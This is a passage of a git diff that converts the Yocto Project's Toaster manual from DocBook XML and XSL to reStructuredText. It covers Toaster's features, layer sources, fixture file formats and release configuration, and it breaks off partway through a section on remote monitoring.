- <t:titlepage t:element="setindex" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="component.title"
- param:node="ancestor-or-self::setindex[1]"
- param:pagewide="1"
- margin-left="0pt"
- font-size="&hsize5;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="colophon" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="component.title"
- param:node="ancestor-or-self::colophon[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize5;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="table.of.contents" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="gentext"
- param:key="'TableofContents'"
- space-before.minimum="1em"
- space-before.optimum="1.5em"
- space-before.maximum="2em"
- space-after="0.5em"
- margin-left="{$title.margin.left}"
- font-size="&hsize3;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
- <t:titlepage t:element="list.of.tables" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="gentext"
- param:key="'ListofTables'"
- space-before.minimum="1em"
- space-before.optimum="1.5em"
- space-before.maximum="2em"
- space-after="0.5em"
- margin-left="{$title.margin.left}"
- font-size="&hsize3;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
- <t:titlepage t:element="list.of.figures" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="gentext"
- param:key="'ListofFigures'"
- space-before.minimum="1em"
- space-before.optimum="1.5em"
- space-before.maximum="2em"
- space-after="0.5em"
- margin-left="{$title.margin.left}"
- font-size="&hsize3;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
- <t:titlepage t:element="list.of.examples" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="gentext"
- param:key="'ListofExamples'"
- space-before.minimum="1em"
- space-before.optimum="1.5em"
- space-before.maximum="2em"
- space-after="0.5em"
- margin-left="{$title.margin.left}"
- font-size="&hsize3;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
- <t:titlepage t:element="list.of.equations" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="gentext"
- param:key="'ListofEquations'"
- space-before.minimum="1em"
- space-before.optimum="1.5em"
- space-before.maximum="2em"
- space-after="0.5em"
- margin-left="{$title.margin.left}"
- font-size="&hsize3;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
- <t:titlepage t:element="list.of.procedures" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="gentext"
- param:key="'ListofProcedures'"
- space-before.minimum="1em"
- space-before.optimum="1.5em"
- space-before.maximum="2em"
- space-after="0.5em"
- margin-left="{$title.margin.left}"
- font-size="&hsize3;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
- <t:titlepage t:element="list.of.unknowns" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="gentext"
- param:key="'ListofUnknown'"
- space-before.minimum="1em"
- space-before.optimum="1.5em"
- space-before.maximum="2em"
- space-after="0.5em"
- margin-left="{$title.margin.left}"
- font-size="&hsize3;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
-</t:templates>
diff --git a/documentation/toaster-manual/history.rst b/documentation/toaster-manual/history.rst
new file mode 100644
index 0000000000..4312837e7f
--- /dev/null
+++ b/documentation/toaster-manual/history.rst
@@ -0,0 +1,58 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+ :widths: 10 15 40
+ :header-rows: 1
+
+ * - Revision
+ - Date
+ - Note
+ * - 1.8
+ - April 2015
+ - The initial document released with the Yocto Project 1.8 Release
+ * - 2.0
+ - October 2015
+ - Released with the Yocto Project 2.0 Release.
+ * - 2.1
+ - April 2016
+ - Released with the Yocto Project 2.1 Release.
+ * - 2.2
+ - October 2016
+ - Released with the Yocto Project 2.2 Release.
+ * - 2.3
+ - May 2017
+ - Released with the Yocto Project 2.3 Release.
+ * - 2.4
+ - October 2017
+ - Released with the Yocto Project 2.4 Release.
+ * - 2.5
+ - May 2018
+ - Released with the Yocto Project 2.5 Release.
+ * - 2.6
+ - November 2018
+ - Released with the Yocto Project 2.6 Release.
+ * - 2.7
+ - May 2019
+ - Released with the Yocto Project 2.7 Release.
+ * - 3.0
+ - October 2019
+ - Released with the Yocto Project 3.0 Release.
+ * - 3.1
+ - April 2020
+ - Released with the Yocto Project 3.1 Release.
+ * - 3.1.1
+ - June 2020
+ - Released with the Yocto Project 3.1.1 Release.
+ * - 3.1.2
+ - August 2020
+ - Released with the Yocto Project 3.1.2 Release.
+ * - 3.1.3
+ - September 2020
+ - Released with the Yocto Project 3.1.3 Release.
+ * - 3.1.4
+ - November 2020
+ - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/toaster-manual/toaster-manual-customization.xsl b/documentation/toaster-manual/toaster-manual-customization.xsl
deleted file mode 100644
index d78694ac14..0000000000
--- a/documentation/toaster-manual/toaster-manual-customization.xsl
+++ /dev/null
@@ -1,28 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
- <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
- <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
- <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
- <xsl:include href="../template/permalinks.xsl"/>
- <xsl:include href="../template/section.title.xsl"/>
- <xsl:include href="../template/component.title.xsl"/>
- <xsl:include href="../template/division.title.xsl"/>
- <xsl:include href="../template/formal.object.heading.xsl"/>
- <xsl:include href="../template/embedded_video.xsl"/>
-
- <xsl:param name="html.stylesheet" select="'toaster-manual-style.css'" />
- <xsl:param name="chapter.autolabel" select="1" />
- <xsl:param name="appendix.autolabel" select="A" />
- <xsl:param name="section.autolabel" select="1" />
- <xsl:param name="section.label.includes.component.label" select="1" />
- <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/toaster-manual/toaster-manual-intro.rst b/documentation/toaster-manual/toaster-manual-intro.rst
new file mode 100644
index 0000000000..408c6fa3c4
--- /dev/null
+++ b/documentation/toaster-manual/toaster-manual-intro.rst
@@ -0,0 +1,105 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************
+Introduction
+************
+
+Toaster is a web interface to the Yocto Project's
+:term:`OpenEmbedded Build System`. The interface
+enables you to configure and run your builds. Information about builds
+is collected and stored in a database. You can use Toaster to configure
+and start builds on multiple remote build servers.
+
+.. _intro-features:
+
+Toaster Features
+================
+
+Toaster allows you to configure and run builds, and it provides
+extensive information about the build process.
+
+- *Configure and Run Builds:* You can use the Toaster web interface to
+ configure and start your builds. Builds started using the Toaster web
+ interface are organized into projects. When you create a project, you
+ are asked to select a release, or version of the build system you
+ want to use for the project builds. As shipped, Toaster supports
+ Yocto Project releases 1.8 and beyond. With the Toaster web
+ interface, you can:
+
+ - Browse layers listed in the various
+ :ref:`layer sources <toaster-manual/toaster-manual-reference:layer source>`
+ that are available in your project (e.g. the OpenEmbedded Layer Index at
+ http://layers.openembedded.org/layerindex/).
+
+ - Browse images, recipes, and machines provided by those layers.
+
+ - Import your own layers for building.
+
+ - Add and remove layers from your configuration.
+
+ - Set configuration variables.
+
+ - Select a target or multiple targets to build.
+
+ - Start your builds.
+
+ Toaster also allows you to configure and run your builds from the
+ command line, and switch between the command line and the web
+ interface at any time. Builds started from the command line appear
+ within a special Toaster project called "Command line builds".
+
+- *Information About the Build Process:* Toaster also records extensive
+ information about your builds. Toaster collects data for builds you
+ start from the web interface and from the command line as long as
+ Toaster is running.
+
+ .. note::
+
+ You must start Toaster before the build or it will not collect
+ build data.
+
+ With Toaster you can:
+
+ - See what was built (recipes and packages) and what packages were
+ installed into your final image.
+
+ - Browse the directory structure of your image.
+
+ - See the value of all variables in your build configuration, and
+ which files set each value.
+
+ - Examine error, warning, and trace messages to aid in debugging.
+
+ - See information about the BitBake tasks executed and reused during
+ your build, including those that used shared state.
+
+ - See dependency relationships between recipes, packages, and tasks.
+
+ - See performance information such as build time, task time, CPU
+ usage, and disk I/O.
+
+For an overview of Toaster shipped with the Yocto Project &DISTRO;
+Release, see the "`Toaster - Yocto Project
+2.2 <https://youtu.be/BlXdOYLgPxA>`__" video.
+
+.. _toaster-installation-options:
+
+Installation Options
+====================
+
+You can set Toaster up to run as a local instance or as a shared hosted
+service.
+
+When Toaster is set up as a local instance, all the components reside on
+a single build host. Fundamentally, a local instance of Toaster is
+suited for a single user developing on a single build host.
+
+.. image:: figures/simple-configuration.png
+ :align: center
+
+Toaster as a hosted service is suited for multiple users developing
+across several build hosts. When Toaster is set up as a hosted service,
+its components can be spread across several machines:
+
+.. image:: figures/hosted-service.png
+ :align: center
diff --git a/documentation/toaster-manual/toaster-manual-intro.xml b/documentation/toaster-manual/toaster-manual-intro.xml
deleted file mode 100644
index e84964c4e1..0000000000
--- a/documentation/toaster-manual/toaster-manual-intro.xml
+++ /dev/null
@@ -1,164 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='toaster-manual-intro'>
-<title>Introduction</title>
-
- <para>
- Toaster is a web interface to the Yocto Project's
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>.
- The interface enables you to configure and run your builds.
- Information about builds is collected and stored in a database.
- You can use Toaster to configure and start builds on multiple
- remote build servers.
- </para>
-
- <section id='intro-features'>
- <title>Toaster Features</title>
-
- <para>
- Toaster allows you to configure and run builds, and it
- provides extensive information about the build process.
- <itemizedlist>
- <listitem><para id='toaster-build-features'>
- <emphasis>Configure and Run Builds:</emphasis>
- You can use the Toaster web interface to configure and
- start your builds.
- Builds started using the Toaster web interface are
- organized into projects.
- When you create a project, you are asked to select a
- release, or version of the build system you want to
- use for the project builds.
- As shipped, Toaster supports Yocto Project releases 1.8
- and beyond.
- With the Toaster web interface, you can:
- <itemizedlist>
- <listitem><para>
- Browse layers listed in the various
- <link linkend='layer-source'>layer sources</link>
- that are available in your project (e.g. the
- OpenEmbedded Layer Index at
- <ulink url='http://layers.openembedded.org/layerindex/'></ulink>).
- </para></listitem>
- <listitem><para>
- Browse images, recipes, and machines provided by
- those layers.
- </para></listitem>
- <listitem><para>
- Import your own layers for building.
- </para></listitem>
- <listitem><para>
- Add and remove layers from your configuration.
- </para></listitem>
- <listitem><para>
- Set configuration variables.
- </para></listitem>
- <listitem><para>
- Select a target or multiple targets to build.
- </para></listitem>
- <listitem><para>
- Start your builds.
- </para></listitem>
- </itemizedlist>
- Toaster also allows you to configure and run your builds
- from the command line, and switch between the command line and
- the web interface at any time.
- Builds started from the command line appear within a special
- Toaster project called "Command line builds".
- </para></listitem>
- <listitem><para id='toaster-analysis-features'>
- <emphasis>Information About the Build Process:</emphasis>
- Toaster also records extensive information about your builds.
- Toaster collects data for builds you start from the web
- interface and from the command line as long as Toaster
- is running.
- <note>
- You must start Toaster before the build or it will not
- collect build data.
- </note></para>
- <para>With Toaster you can:
- <itemizedlist>
- <listitem><para>
- See what was built (recipes and packages) and what
- packages were installed into your final image.
- </para></listitem>
- <listitem><para>
- Browse the directory structure of your image.
- </para></listitem>
- <listitem><para>
- See the value of all variables in your build
- configuration, and which files set each value.
- </para></listitem>
- <listitem><para>
- Examine error, warning, and trace messages to aid
- in debugging.
- </para></listitem>
- <listitem><para>
- See information about the BitBake tasks executed
- and reused during your build, including those that
- used shared state.
- </para></listitem>
- <listitem><para>
- See dependency relationships between recipes,
- packages, and tasks.
- </para></listitem>
- <listitem><para>
- See performance information such as build time,
- task time, CPU usage, and disk I/O.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- For an overview of Toaster shipped with the Yocto Project &DISTRO;
- Release, see the
- "<ulink url='https://youtu.be/BlXdOYLgPxA'>Toaster - Yocto Project 2.2</ulink>"
- video.
- </para>
- </section>
-
- <section id='toaster-installation-options'>
- <title>Installation Options</title>
-
- <para>
- You can set Toaster up to run as a local instance or as a shared
- hosted service.
- </para>
-
- <para>
- When Toaster is set up as a local instance, all the components
- reside on a single build host.
- Fundamentally, a local instance of Toaster is suited for a single
- user developing on a single build host.
- </para>
-
- <para>
- <imagedata fileref="figures/simple-configuration.png" align="center" width="6in" depth="1.5in" />
- </para>
-
- <para>
- Toaster as a hosted service is suited for multiple users
- developing across several build hosts.
- When Toaster is set up as a hosted service, its components can
- be spread across several machines:
- </para>
-
- <para>
- <imagedata fileref="figures/hosted-service.png" align="center" width="6in" depth="3.5in" />
- </para>
- </section>
-
-<!--THIS EXTRA INFORMATION PROBABLY WILL GO AWAY
- For additional information on installing and running Toaster, see the
- "<ulink url='https://wiki.yoctoproject.org/wiki/Toaster#Installation_and_Running'>Installation and Running</ulink>"
- section of the "Toaster" wiki page.
- For complete information on the API and its search operation
- URI, parameters, and responses, see the
- <ulink url='https://wiki.yoctoproject.org/wiki/REST_API_Contracts'>REST API Contracts</ulink>
- Wiki page.
- </para>
--->
-</chapter>
diff --git a/documentation/toaster-manual/toaster-manual-reference.rst b/documentation/toaster-manual/toaster-manual-reference.rst
new file mode 100644
index 0000000000..bd3a060eee
--- /dev/null
+++ b/documentation/toaster-manual/toaster-manual-reference.rst
@@ -0,0 +1,662 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+**********************
+Concepts and Reference
+**********************
+
+In order to configure and use Toaster, you should understand some
+concepts and have some basic command reference material available. This
+final chapter provides conceptual information on layer sources,
+releases, and JSON configuration files. Also provided is a quick look at
+some useful ``manage.py`` commands that are Toaster-specific.
+Information on ``manage.py`` commands does exist across the Web and the
+information in this manual by no means attempts to provide a command
+comprehensive reference.
+
+Layer Source
+============
+
+In general, a "layer source" is a source of information about existing
+layers. In particular, we are concerned with layers that you can use
+with the Yocto Project and Toaster. This chapter describes a particular
+type of layer source called a "layer index."
+
+A layer index is a web application that contains information about a set
+of custom layers. A good example of an existing layer index is the
+OpenEmbedded Layer Index. A public instance of this layer index exists
+at http://layers.openembedded.org. You can find the code for this
+layer index's web application at
+http://git.yoctoproject.org/cgit/cgit.cgi/layerindex-web/.
+
+When you tie a layer source into Toaster, it can query the layer source
+through a
+`REST <http://en.wikipedia.org/wiki/Representational_state_transfer>`__
+API, store the information about the layers in the Toaster database, and
+then show the information to users. Users are then able to view that
+information and build layers from Toaster itself without worrying about
+cloning or editing the BitBake layers configuration file
+``bblayers.conf``.
+
+Tying a layer source into Toaster is convenient when you have many
+custom layers that need to be built on a regular basis by a community of
+developers. In fact, Toaster comes pre-configured with the OpenEmbedded
+Metadata Index.
+
+.. note::
+
+ You do not have to use a layer source to use Toaster. Tying into a
+ layer source is optional.
+
+.. _layer-source-using-with-toaster:
+
+Setting Up and Using a Layer Source
+-----------------------------------
+
+To use your own layer source, you need to set up the layer source and
+then tie it into Toaster. This section describes how to tie into a layer
+index in a manner similar to the way Toaster ties into the OpenEmbedded
+Metadata Index.
+
+Understanding Your Layers
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The obvious first step for using a layer index is to have several custom
+layers that developers build and access using the Yocto Project on a
+regular basis. This set of layers needs to exist and you need to be
+familiar with where they reside. You will need that information when you
+set up the code for the web application that "hooks" into your set of
+layers.
+
+For general information on layers, see the
+":ref:`overview-manual/overview-manual-yp-intro:the yocto project layer model`"
+section in the Yocto Project Overview and Concepts Manual. For information on how
+to create layers, see the ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _configuring-toaster-to-hook-into-your-layer-source:
+
+Configuring Toaster to Hook Into Your Layer Index
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+If you want Toaster to use your layer index, you must host the web
+application in a server to which Toaster can connect. You also need to
+give Toaster the information about your layer index. In other words, you
+have to configure Toaster to use your layer index. This section
+describes two methods by which you can configure and use your layer
+index.
+
+In the previous section, the code for the OpenEmbedded Metadata Index
+(i.e. http://layers.openembedded.org) was referenced. You can use
+this code, which is at
+http://git.yoctoproject.org/cgit/cgit.cgi/layerindex-web/, as a
+base to create your own layer index.
+
+Use the Administration Interface
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Access the administration interface through a browser by entering the
+URL of your Toaster instance and adding "``/admin``" to the end of the
+URL. As an example, if you are running Toaster locally, use the
+following URL::
+
+ http://127.0.0.1:8000/admin
+
+The administration interface has a "Layer sources" section that includes
+an "Add layer source" button. Click that button and provide the required
+information. Make sure you select "layerindex" as the layer source type.
+
+Use the Fixture Feature
+^^^^^^^^^^^^^^^^^^^^^^^
+
+The Django fixture feature overrides the default layer server when you
+use it to specify a custom URL. To use the fixture feature, create (or
+edit) the file ``bitbake/lib/toaster.orm/fixtures/custom.xml``, and then
+set the following Toaster setting to your custom URL:
+
+.. code-block:: xml
+
+ <?xml version="1.0" ?>
+ <django-objects version="1.0">
+ <object model="orm.toastersetting" pk="100">
+ <field name="name" type="CharField">CUSTOM_LAYERINDEX_SERVER</field>
+ <field name="value" type="CharField">https://layers.my_organization.org/layerindex/branch/master/layers/</field>
+ </object>
+ <django-objects>
+
+When you start Toaster for the first time, or
+if you delete the file ``toaster.sqlite`` and restart, the database will
+populate cleanly from this layer index server.
+
+Once the information has been updated, verify the new layer information
+is available by using the Toaster web interface. To do that, visit the
+"All compatible layers" page inside a Toaster project. The layers from
+your layer source should be listed there.
+
+If you change the information in your layer index server, refresh the
+Toaster database by running the following command:
+
+.. code-block:: shell
+
+ $ bitbake/lib/toaster/manage.py lsupdates
+
+
+If Toaster can reach the API URL, you should see a message telling you that
+Toaster is updating the layer source information.
+
+.. _toaster-releases:
+
+Releases
+========
+
+When you create a Toaster project using the web interface, you are asked
+to choose a "Release." In the context of Toaster, the term "Release"
+refers to a set of layers and a BitBake version the OpenEmbedded build
+system uses to build something. As shipped, Toaster is pre-configured
+with releases that correspond to Yocto Project release branches.
+However, you can modify, delete, and create new releases according to
+your needs. This section provides some background information on
+releases.
+
+.. _toaster-releases-supported:
+
+Pre-Configured Releases
+-----------------------
+
+As shipped, Toaster is configured to use a specific set of releases. Of
+course, you can always configure Toaster to use any release. For
+example, you might want your project to build against a specific commit
+of any of the "out-of-the-box" releases. Or, you might want your project
+to build against different revisions of OpenEmbedded and BitBake.
+
+As shipped, Toaster is configured to work with the following releases:
+
+- *Yocto Project &DISTRO; "&DISTRO_NAME;" or OpenEmbedded "&DISTRO_NAME;":*
+ This release causes your Toaster projects to build against the head
+ of the &DISTRO_NAME_NO_CAP; branch at
+ :yocto_git:`/cgit/cgit.cgi/poky/log/?h=&DISTRO_NAME_NO_CAP;` or
+ http://git.openembedded.org/openembedded-core/commit/?h=&DISTRO_NAME_NO_CAP;.
+
+- *Yocto Project "Master" or OpenEmbedded "Master":* This release
+ causes your Toaster Projects to build against the head of the master
+ branch, which is where active development takes place, at
+ :yocto_git:`/cgit/cgit.cgi/poky/log/` or
+ http://git.openembedded.org/openembedded-core/log/.
+
+- *Local Yocto Project or Local OpenEmbedded:* This release causes your
+ Toaster Projects to build against the head of the ``poky`` or
+ ``openembedded-core`` clone you have local to the machine running
+ Toaster.
+
+Configuring Toaster
+===================
+
+In order to use Toaster, you must configure the database with the
+default content. The following subsections describe various aspects of
+Toaster configuration.
+
+Configuring the Workflow
+------------------------
+
+The ``bldcontrol/management/commands/checksettings.py`` file controls
+workflow configuration. The following steps outline the process to
+initially populate this database.
+
+1. The default project settings are set from
+ ``orm/fixtures/settings.xml``.
+
+2. The default project distro and layers are added from
+ ``orm/fixtures/poky.xml`` if poky is installed. If poky is not
+ installed, they are added from ``orm/fixtures/oe-core.xml``.
+
+3. If the ``orm/fixtures/custom.xml`` file exists, then its values are
+ added.
+
+4. The layer index is then scanned and added to the database.
+
+Once these steps complete, Toaster is set up and ready to use.
+
+Customizing Pre-Set Data
+------------------------
+
+The pre-set data for Toaster is easily customizable. You can create the
+``orm/fixtures/custom.xml`` file to customize the values that go into to
+the database. Customization is additive, and can either extend or
+completely replace the existing values.
+
+You use the ``orm/fixtures/custom.xml`` file to change the default
+project settings for the machine, distro, file images, and layers. When
+creating a new project, you can use the file to define the offered
+alternate project release selections. For example, you can add one or
+more additional selections that present custom layer sets or distros,
+and any other local or proprietary content.
+
+Additionally, you can completely disable the content from the
+``oe-core.xml`` and ``poky.xml`` files by defining the section shown
+below in the ``settings.xml`` file. For example, this option is
+particularly useful if your custom configuration defines fewer releases
+or layers than the default fixture files.
+
+The following example sets "name" to "CUSTOM_XML_ONLY" and its value to
+"True".
+
+.. code-block:: xml
+
+ <object model="orm.toastersetting" pk="99">
+ <field type="CharField" name="name">CUSTOM_XML_ONLY</field>
+ <field type="CharField" name="value">True</field>
+ </object>
+
+Understanding Fixture File Format
+---------------------------------
+
+The following is an overview of the file format used by the
+``oe-core.xml``, ``poky.xml``, and ``custom.xml`` files.
+
+The following subsections describe each of the sections in the fixture
+files, and outline an example section of the XML code. you can use to
+help understand this information and create a local ``custom.xml`` file.
+
+Defining the Default Distro and Other Values
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This section defines the default distro value for new projects. By
+default, it reserves the first Toaster Setting record "1". The following
+demonstrates how to set the project default value for
+:term:`DISTRO`:
+
+.. code-block:: xml
+
+ <!-- Set the project default value for DISTRO -->
+ <object model="orm.toastersetting" pk="1">
+ <field type="CharField" name="name">DEFCONF_DISTRO</field>
+ <field type="CharField" name="value">poky</field>
+ </object>
+
+You can override
+other default project values by adding additional Toaster Setting
+sections such as any of the settings coming from the ``settings.xml``
+file. Also, you can add custom values that are included in the BitBake
+environment. The "pk" values must be unique. By convention, values that
+set default project values have a "DEFCONF" prefix.
+
+Defining BitBake Version
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+The following defines which version of BitBake is used for the following
+release selection:
+
+.. code-block:: xml
+
+ <!-- Bitbake versions which correspond to the metadata release -->
+ <object model="orm.bitbakeversion" pk="1">
+ <field type="CharField" name="name">&DISTRO_NAME_NO_CAP;</field>
+ <field type="CharField" name="giturl">git://git.yoctoproject.org/poky</field>
+ <field type="CharField" name="branch">&DISTRO_NAME_NO_CAP;</field>
+ <field type="CharField" name="dirpath">bitbake</field>
+ </object>
+
+.. _defining-releases:
+
+Defining Release
+~~~~~~~~~~~~~~~~
+
+The following defines the releases when you create a new project:
+
+.. code-block:: xml
+
+ <!-- Releases available -->
+ <object model="orm.release" pk="1">
+ <field type="CharField" name="name">&DISTRO_NAME_NO_CAP;</field>
+ <field type="CharField" name="description">Yocto Project &DISTRO; "&DISTRO_NAME;"</field>
+ <field rel="ManyToOneRel" to="orm.bitbakeversion" name="bitbake_version">1</field>
+ <field type="CharField" name="branch_name">&DISTRO_NAME_NO_CAP;</field>
+ <field type="TextField" name="helptext">Toaster will run your builds using the tip of the <a href="http://git.yoctoproject.org/cgit/cgit.cgi/poky/log/?h=&DISTRO_NAME_NO_CAP;">Yocto Project &DISTRO_NAME; branch</a>.</field>
+ </object>
+
+The "pk" value must match the above respective BitBake version record.
+
+Defining the Release Default Layer Names
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The following defines the default layers for each release:
+
+.. code-block:: xml
+
+ <!-- Default project layers for each release -->
+ <object model="orm.releasedefaultlayer" pk="1">
+ <field rel="ManyToOneRel" to="orm.release" name="release">1</field>
+ <field type="CharField" name="layer_name">openembedded-core</field>
+ </object>
+
+The 'pk' values in the example above should start at "1" and increment
+uniquely. You can use the same layer name in multiple releases.
+
+Defining Layer Definitions
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Layer definitions are the most complex. The following defines each of
+the layers, and then defines the exact layer version of the layer used
+for each respective release. You must have one ``orm.layer`` entry for
+each layer. Then, with each entry you need a set of
+``orm.layer_version`` entries that connects the layer with each release
+that includes the layer. In general all releases include the layer.
+
+.. code-block:: xml
+
+ <object model="orm.layer" pk="1">
+ <field type="CharField" name="name">openembedded-core</field>
+ <field type="CharField" name="layer_index_url"></field>
+ <field type="CharField" name="vcs_url">git://git.yoctoproject.org/poky</field>
+ <field type="CharField" name="vcs_web_url">http://git.yoctoproject.org/cgit/cgit.cgi/poky</field>
+ <field type="CharField" name="vcs_web_tree_base_url">http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/%path%?h=%branch%</field>
+ <field type="CharField" name="vcs_web_file_base_url">http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/%path%?h=%branch%</field>
+ </object>
+ <object model="orm.layer_version" pk="1">
+ <field rel="ManyToOneRel" to="orm.layer" name="layer">1</field>
+ <field type="IntegerField" name="layer_source">0</field>
+ <field rel="ManyToOneRel" to="orm.release" name="release">1</field>
+ <field type="CharField" name="branch">&DISTRO_NAME_NO_CAP;</field>
+ <field type="CharField" name="dirpath">meta</field>
+ </object> <object model="orm.layer_version" pk="2">
+ <field rel="ManyToOneRel" to="orm.layer" name="layer">1</field>
+ <field type="IntegerField" name="layer_source">0</field>
+ <field rel="ManyToOneRel" to="orm.release" name="release">2</field>
+ <field type="CharField" name="branch">HEAD</field>
+ <field type="CharField" name="commit">HEAD</field>
+ <field type="CharField" name="dirpath">meta</field>
+ </object>
+ <object model="orm.layer_version" pk="3">
+ <field rel="ManyToOneRel" to="orm.layer" name="layer">1</field>
+ <field type="IntegerField" name="layer_source">0</field>
+ <field rel="ManyToOneRel" to="orm.release" name="release">3</field>
+ <field type="CharField" name="branch">master</field>
+ <field type="CharField" name="dirpath">meta</field>
+ </object>
+
+The layer "pk" values above must be unique, and typically start at "1". The
+layer version "pk" values must also be unique across all layers, and typically
+start at "1".
+
+Remote Toaster Monitoring
+=========================
+
+Toaster has an API that allows remote management applications to
+directly query the state of the Toaster server and its builds in a
+machine-to-machine manner. This API uses the
+`REST <http://en.wikipedia.org/wiki/Representational_state_transfer>`__
+interface and the transfer of JSON files. For example, you might monitor
+a build inside a container through well supported known HTTP ports in
+order to easily access a Toaster server inside the container. In this
+example, when you use this direct JSON API, you avoid having web page
+parsing against the display the user sees.
+
+Checking Health
+---------------
+
+Before you use remote Toaster monitoring, you should do a health check.
+To do this, ping the Toaster server using the following call to see if
